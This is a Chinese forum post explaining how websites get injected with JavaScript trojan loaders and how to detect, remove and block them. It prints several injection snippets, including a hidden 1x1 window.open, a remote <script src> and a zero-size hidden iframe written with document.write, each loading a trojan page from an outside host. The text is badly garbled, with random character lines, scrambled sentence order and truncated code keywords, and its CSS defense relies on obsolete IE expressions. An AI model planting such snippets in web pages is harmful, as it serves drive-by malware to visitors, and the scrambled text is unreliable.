搜索
查看: 11736|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

% N/ v/ c& Z1 Z/ L V

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

7 G, X( P( ?) b/ _

IFRAME 和 JS 脚本挂马。

; |* W2 g$ P- y' v4 q3 S

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

; C+ n/ o \) Z; f8 x6 r$ j" v% f' O

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

. ~6 }4 }; ~3 @: O: _! b) V

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

1 H7 L8 Y( }9 Z' y* a0 R. J

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

/ l+ ?& z* E2 `- L, R0 ?

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

1 \% ^) ?' D7 V1 \) V) r# f

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

+ S4 o- t3 a+ ?: E: C! [8 t

。一千多位会员的 ID

! Q) {- W; z; _- I. |5 u, q X

2: 如何检测网页是否被挂马。

) X4 T2 o; A' y

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

& |" }' n) j" t% g8 S

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

. `/ E! U# ~8 V8 Y( n# D _, T

因素。
2 googl 检测。>

) A8 t5 V$ Q- ~" A% T8 J

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

0 j+ z3 `) j# H6 F9 |) J, c6 e+ Y4 G

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

2 `* [3 d" G2 o2 E0 H) W

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

2 T4 }4 f0 V0 u( r# Z4 D( Q

7 M5 O4 d: z0 T0 P% X+ ^# K1 e s

3: 如何清除网页木马。

# D$ x) D2 g8 u

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

7 R0 _2 Q, G! \2 u

入源文件把相关的网页挂马种类的可疑代码删除。

6 j! i6 B3 J- o8 L0 d

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

. A. S4 v- V0 A- J+ `

悉。>

: i7 R: ?- X) M* r* W6 B" I0 J/ D2 b' f

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

0 t- t) w3 q* p) u8 X

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

- M' b4 f$ _- b8 v$ y

2 保证你所使用的顺序及时的更新。

: V8 O/ E5 L/ a3 I+ }

3 不要在前台网页上加注后台管理程序登陆页面的链接。

% L. o: K1 r- q' j4 p# z

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

; W) t, I: W- q: b0 k

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

# p* K0 r9 U6 a) y7 t

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

! m- W3 X2 q8 m. B! h) i3 t5 B( @

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

) m' n1 n$ Q1 D! \% I

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

8 k6 m) q% {$ O- j: s: P

$ @6 a+ A' J0 O

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

, ~6 Z q3 |, t, s& p7 C

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

* m8 |5 t6 h/ k+ j4 n6 V2 L% @

JS 挂马溯源

3 N8 R8 Q3 H+ F# u+ C( z

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

) ^* e# H) ]9 M8 O/ x

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

" o7 w1 u! E: y3 q, Y; {

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

6 S& D, k* ^$ e7 _

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

! S E9 H# C9 S8 N- ?& f1 Z* C4 ~& H

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

' T9 h% g u1 C

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

P/ ~4 n% n+ R8 x1 d

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

7 X) l5 T* z; R: Y/ v9 w! Q: S/ t

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

2 d# k+ x1 O: r. n

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

# Y9 K @1 k& D8 m

脚本在工作中会有很大的协助。

* R" x5 G! j* ?! l

挂马原理一点通

0 e* Z+ {% }0 ]9 g/ n/ _

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

' B9 g8 D$ U; p5 w- a# J5 c. i, u$ v5 ^

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

& k6 p' A$ W; L$ d$ a* Y9 J' N

无从区分木马在何处。

" |* z9 N9 ?* c0 D

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

/ {8 y, ?5 o* o! ~0 @2 E0 y

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

$ D' z- [9 e3 F5 i3 d' Z0 P

容易蒙混过关,导致木马久杀不绝。

" R8 Q: E7 A9 L, C$ d" Z1 ]0 p

JS 挂马攻防实录

! ?& i% l$ M& [; K; q8 U

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

; O- |6 K6 s5 v9 O) i" r! U: ]$ ~

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

% Q; D! u; w6 A8 z; e

这种方法使用的关键代码如下:

4 i/ z, D* Z5 W! W1 ~

"",  window.open "http://www.v404.cn/ 木马

& f3 r! U) E5 c6 g* t9 c2 s- Y

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

9 ]; l( ^- t0 s7 S5 V

, s) s7 \, }9 |

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

7 |; s! ~. r2 A& I% y/ A$ E8 t& g

但是设置为 0 后,可能会出现恶意代码不运行的情况。

! i1 d, R: s9 X5 c0 Y K

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

. V5 p* D0 |9 r8 a5 X8 Q

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

. S$ m) ]+ u3 t/ t7 r

" f9 o) x' K4 O/ L+ f# N

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

: {% C( w7 n; ^! r- U, N( s; `3 U: O

+ d& o7 j$ d. {3 I

或者

' ?; q, d9 }2 J7 u

document.writ "<div style='display:none'>"

! }- D8 D2 b) a, L4 `

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

) X( v2 t8 Q. _. C

document.writ "</div>"
 

1 n3 ~0 g1 y9 |; Y: i; b

& i V0 b, r. y. G& ~& H

就成功地将木马挂到对方的网页中了

! N& W6 R6 H. K) p: I+ n

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

: T: [1 ], x, {- g

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

' x* \$ Y9 i) h+ i

或者:

# X& a3 F# R5 ~/ `9 \

<ifram src="vbscript:[ 挂马脚本 ]">

3 F( c2 H3 |! g5 V1 D/ k

; {0 X \, [, l1 e# r# A, u


等等 …

7 v: J0 A; R: d9 f) \, k; ~

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

7 n8 ]% v/ ^: e/ p- k. E

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

% ?' V" H0 r7 z8 A8 {8 ]! t0 Z

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

& b4 P0 h2 U$ i+ U# _, m# x- b9 a9 |& z

;}

7 w4 \1 {, r, V3 F

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

$ K7 p+ N1 D' {0 } s8 T4 j7 l

! m7 Y' E7 _* h/ x; S

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

3 c' o! o: B' E2 A) y

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

8 \" l9 Q3 V* ?8 N, J! {7 \4 Q

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

: i/ Y, p1 n5 _; x& O4 m% v

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

. A% K" ^; r) B" x. l, C

<title> 让 JS 挂马中止的 CSS 代码 </title>

1 ]9 g- `* E; ~$ D: r L5 A Q9 ?

<styl type="text/css" id="shudoo">

B' z' L5 z# f9 |& B a

/*<![CDATA[*/

$ T) F+ l& b# _* O- V' U: D

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

/ l* R5 G; V; e* Y

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

6 g9 P! B7 J, p, R. [! R% z

/*]]>*/

* _% p2 o" W: x$ ^; F

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表